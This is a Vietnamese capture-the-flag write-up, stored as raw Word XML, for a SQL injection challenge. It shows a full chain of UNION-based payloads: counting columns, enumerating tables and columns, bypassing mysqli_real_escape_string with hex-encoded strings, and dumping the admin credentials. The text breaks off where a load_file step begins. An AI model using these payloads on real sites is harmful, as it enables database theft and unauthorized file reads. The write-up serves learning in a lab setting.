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E940" w14:textId="08FC49CE" w:rsidR="002F49FE" w:rsidRDefault="00A613EA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau khi fuzz lỗi, mình thấy sql injection ở url: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A613EA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>web-serveur/ch31/?action=members&amp;id=1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A81E21" w14:textId="77777777" w:rsidR="00A613EA" w:rsidRDefault="00A613EA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="347413BE" w14:textId="3998BDF7" w:rsidR="00A613EA" w:rsidRDefault="00A613EA">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A613EA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\'' at line 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BC8EBD" w14:textId="63BCB29D" w:rsidR="00A613EA" w:rsidRDefault="00A613EA">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="591D1596" w14:textId="79AA061E" w:rsidR="00A613EA" w:rsidRDefault="00A613EA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Mysqli_real_escape_string: dấu nháy đơn ‘ </w:t>
      </w:r>
      <w:r w:rsidRPr="00A613EA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> \’</w:t>
      </w:r>
      <w:r w:rsidR="00B2262F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (không dùng nháy đơn dc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B474D2" w14:textId="43F27B99" w:rsidR="00B2262F" w:rsidRDefault="00B2262F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="487C7838" w14:textId="235FA520" w:rsidR="00B2262F" w:rsidRDefault="00B2262F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mình kiểm tra số cột bằng UNION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274E7FD6" w14:textId="19B84935" w:rsidR="00B2262F" w:rsidRDefault="00B2262F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Id=1 union select null,null,null,null </w:t>
      </w:r>
      <w:r w:rsidRPr="00B2262F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> no result found </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDD36FE" w14:textId="36F9F156" w:rsidR="007B6ADD" w:rsidRDefault="007B6ADD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Câu truy vấn có 4 cột nhưng chỉ print 3 cột </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481AEF25" w14:textId="4C553429" w:rsidR="007B6ADD" w:rsidRDefault="007B6AD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991"/>
        <w:gridCol w:w="3685"/>
      </w:tblGrid>
      <w:tr w:rsidR="007B6ADD" w14:paraId="35DEA7C7" w14:textId="77777777" w:rsidTr="007B6ADD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2337" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CA0572F" w14:textId="16A0B4BB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337" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E3D78CB" w14:textId="2849D55C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991" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="474FF1F7" w14:textId="77777777" w:rsidR="007B6ADD" w:rsidRDefault="007B6ADD">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61027210" w14:textId="09CD07FE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7B6ADD" w14:paraId="4EF9744F" w14:textId="77777777" w:rsidTr="007B6ADD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2337" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A2154AC" w14:textId="2DAC4284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14:paraId="6BBA4849" w14:textId="4B3190E5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991" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="647417D2" w14:textId="77777777" w:rsidR="007B6ADD" w:rsidRDefault="007B6ADD">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54C2C481" w14:textId="6D282CDA" w:rsidR="007B6ADD" w:rsidRDefault="007B6ADD">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B6ADD">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>admin@super-secure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-webapp.org</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B6ADD" w14:paraId="5EEFF0A8" w14:textId="77777777" w:rsidTr="007B6ADD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2337" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52EFE6AC" w14:textId="02868A46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337" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58712482" w14:textId="22FEA9F8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991" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="079268C5" w14:textId="6B8E86CB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3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16CA035E" w14:textId="55F818D9" w:rsidR="007B6ADD" w:rsidRDefault="007B6ADD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</w:tbl>
    <w:p w14:paraId="7BBEDAF0" w14:textId="052DBE9B" w:rsidR="007B6ADD" w:rsidRDefault="007B6ADD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46F5E1E0" w14:textId="010DEB26" w:rsidR="007B6ADD" w:rsidRDefault="00643DE8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kết quả có 2 dòng, csdl ko bt truy suất dòng nào</w:t>
      </w:r>
      <w:r w:rsidRPr="00643DE8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> no result found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789E2126" w14:textId="77777777" w:rsidR="00643DE8" w:rsidRDefault="00643DE8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FF459DE" w14:textId="29DDBC4A" w:rsidR="00B2262F" w:rsidRDefault="00B2262F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Id=1 and 1=2 union select null,null,null,null</w:t>
      </w:r>
      <w:r w:rsidRPr="00B2262F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> table có 4 cột </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8D1F93" w14:textId="656A9993" w:rsidR="00B2262F" w:rsidRDefault="00B2262F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tại sao phải thêm đk 1=2?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45929676" w14:textId="5EBC0D1C" w:rsidR="00643DE8" w:rsidRDefault="00643DE8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Khi id=1, nó ra data gì đó, 1=2 đk sai thì nó kh ra data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4FDA5D" w14:textId="1F3D1238" w:rsidR="00643DE8" w:rsidRDefault="00643DE8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kết quả còn 1 dòng.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43DE8" w14:paraId="00994C3E" w14:textId="77777777" w:rsidTr="00643DE8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2337" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AB63E64" w14:textId="65B795E0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337" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C846C5A" w14:textId="4C66F03B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338" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F3D935D" w14:textId="77777777" w:rsidR="00643DE8" w:rsidRDefault="00643DE8">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2338" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="484B0205" w14:textId="4FCB099B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</w:tr>
      <w:tr w:rsidR="00643DE8" w14:paraId="289A6604" w14:textId="77777777" w:rsidTr="00643DE8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2337" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="140E9282" w14:textId="295065CC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337" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E17509C" w14:textId="421F03DE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338" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F7C254F" w14:textId="0F9EBCCC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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="2338" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48B02579" w14:textId="7B275894" w:rsidR="00643DE8" w:rsidRDefault="00643DE8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</w:tbl>
    <w:p w14:paraId="04F0BC46" w14:textId="77777777" w:rsidR="00643DE8" w:rsidRDefault="00643DE8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BBF36E4" w14:textId="7D207863" w:rsidR="00B2262F" w:rsidRDefault="00643DE8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643DE8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>câu truy vấn thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B7718A" w14:textId="5B76D72C" w:rsidR="00643DE8" w:rsidRDefault="00643DE8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7929A28D" w14:textId="39590303" w:rsidR="007D3AB6" w:rsidRDefault="007D3AB6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ngoài ra bạn có thể dùng limit/offset để nó trả về 1 record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D55505" w14:textId="77777777" w:rsidR="007D3AB6" w:rsidRDefault="007D3AB6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F763AB6" w14:textId="086570E9" w:rsidR="00643DE8" w:rsidRDefault="00750E72">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00643DE8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trong trường hợp là chuỗi, để print thành công</w:t>
      </w:r>
      <w:r w:rsidR="00643DE8" w:rsidRPr="00643DE8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00643DE8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>url=?id=’ union select null,nul</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>l--)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A943DB" w14:textId="169CFEA7" w:rsidR="00750E72" w:rsidRDefault="00750E72">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FE21B32" w14:textId="5355AD84" w:rsidR="00750E72" w:rsidRDefault="00750E72">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tiếp theo mình sẽ kiểm tra version:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EE8223" w14:textId="7CC0D33E" w:rsidR="00750E72" w:rsidRDefault="00750E72">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="00750E72">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1 and 1=2 union select null,null,null,@@version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00750E72">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Maria DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C74DD0D" w14:textId="53F4D458" w:rsidR="00750E72" w:rsidRDefault="00750E72">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72830736" w14:textId="4EB8AC26" w:rsidR="00750E72" w:rsidRDefault="00750E72">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Kiểm tra tên bảng: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB11369" w14:textId="7CF3096E" w:rsidR="00750E72" w:rsidRDefault="00B958C4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">C1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B958C4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1 and 1=2 union select null,null,null,(select table_name from information_schema.tables where table_schema=database())</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B958C4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>table member</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BDB09B" w14:textId="255F60A1" w:rsidR="00B958C4" w:rsidRDefault="00B958C4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">C2: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B958C4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1 and 1=2 union select null,null,null,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>group_concat(table_name) from information_schema.tables where table_schema=database()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570AD4A2" w14:textId="558C2404" w:rsidR="00B958C4" w:rsidRDefault="00B958C4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C4E8D22" w14:textId="4307FD34" w:rsidR="00B958C4" w:rsidRDefault="00B958C4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kiểm tra tên cột:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24897F45" w14:textId="087F1617" w:rsidR="00B958C4" w:rsidRDefault="00B958C4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">C1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B958C4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1 and 1=2 union select null,null,null,</w:t>
      </w:r>
      <w:r w:rsidR="00762E07">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00762E07" w:rsidRPr="00762E07">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>select column_name from information_schema.columns where table_name=0x6d656d626572 limit 0,1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7F20D6" w14:textId="3E1B7939" w:rsidR="00762E07" w:rsidRDefault="00762E07">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F06647C" w14:textId="3DDE427C" w:rsidR="00762E07" w:rsidRDefault="00762E07">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Vì  where table_name=’member’ có dấu nháy đơn</w:t>
      </w:r>
      <w:r w:rsidRPr="00762E07">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> truy vấn ko thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A96F8F" w14:textId="20E485C8" w:rsidR="00762E07" w:rsidRDefault="00762E07">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Để bypass đc mysqli_real_escape_string </w:t>
      </w:r>
      <w:r w:rsidRPr="00762E07">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> mã hóa hexa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79ED0DFD" w14:textId="6AFF9EA0" w:rsidR="00762E07" w:rsidRDefault="00762E07">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> member </w:t>
      </w:r>
      <w:r w:rsidRPr="00762E07">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x</w:t>
      </w:r>
      <w:r w:rsidRPr="00762E07">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6d656d626572</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (khi đưa vào csdl không cần dấu nháy đơn, dấu +)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39671B0A" w14:textId="0C63D350" w:rsidR="00762E07" w:rsidRDefault="00762E07">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Nếu không có limit 0,1 sẽ báo lỗi “</w:t>
      </w:r>
      <w:r w:rsidRPr="00762E07">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Subquery returns more than 1 row</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAE548A" w14:textId="76EE1FFA" w:rsidR="00762E07" w:rsidRDefault="00762E07">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="284D9EC0" w14:textId="0448096A" w:rsidR="00762E07" w:rsidRDefault="00762E07">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">C2: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B958C4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1 and 1=2 union select null,null,null,</w:t>
      </w:r>
      <w:r w:rsidR="00955F48" w:rsidRPr="00955F48">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00955F48" w:rsidRPr="00955F48">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>group_concat(column_name) from information_schema.columns where table_name=0x6d656d626572</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9DE386" w14:textId="6CFB5005" w:rsidR="00955F48" w:rsidRDefault="00955F48">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">kết quả: </w:t>
      </w:r>
      <w:r w:rsidRPr="00955F48">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>member_id,member_login,member_password,member_email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (rất nhanh)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0039AF34" w14:textId="40031A35" w:rsidR="00955F48" w:rsidRDefault="00955F48">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5211458F" w14:textId="127D79DA" w:rsidR="00955F48" w:rsidRDefault="00955F48">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00955F48">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dễ dàng tìm được mk của admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B8564A" w14:textId="7EE7BDE1" w:rsidR="00955F48" w:rsidRDefault="00955F48">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00955F48">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1 and 1=2 union select null,null,null,group_concat(member_login,0x3a,member_password) from member</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (0x3a là dấu : )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6C5A59" w14:textId="0972B230" w:rsidR="00955F48" w:rsidRDefault="00955F48">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00955F48">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>admin:VA5QA1cCVQgPXwEAXwZVVVsHBgtfUVBaV1QEAwIFVAJWAwBRC1tRVA==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102A9EB8" w14:textId="4E17A168" w:rsidR="00955F48" w:rsidRDefault="00955F48">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5774E0E0" w14:textId="39E3CF1C" w:rsidR="00955F48" w:rsidRDefault="00955F48" w:rsidP="00955F48">
      <w:r>
        <w:t>Nhưng password lại là base64 @@. Mình nghĩ cứ decode ra là xong nhưng mà nó không phải là plain-text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738D47ED" w14:textId="0E0D3860" w:rsidR="00955F48" w:rsidRDefault="00955F48" w:rsidP="00955F48"/>
    <w:p w14:paraId="2C38764B" w14:textId="5154577A" w:rsidR="00955F48" w:rsidRDefault="004415A5" w:rsidP="00955F48">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mục đích của challenge là đọc file source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BACBFB5" w14:textId="4771C3D2" w:rsidR="004415A5" w:rsidRDefault="004415A5" w:rsidP="00955F48">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Mình sẽ dùng hàm load_file, pathfile là </w:t>
      </w:r>
      <w:r w:rsidR="00921CBE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
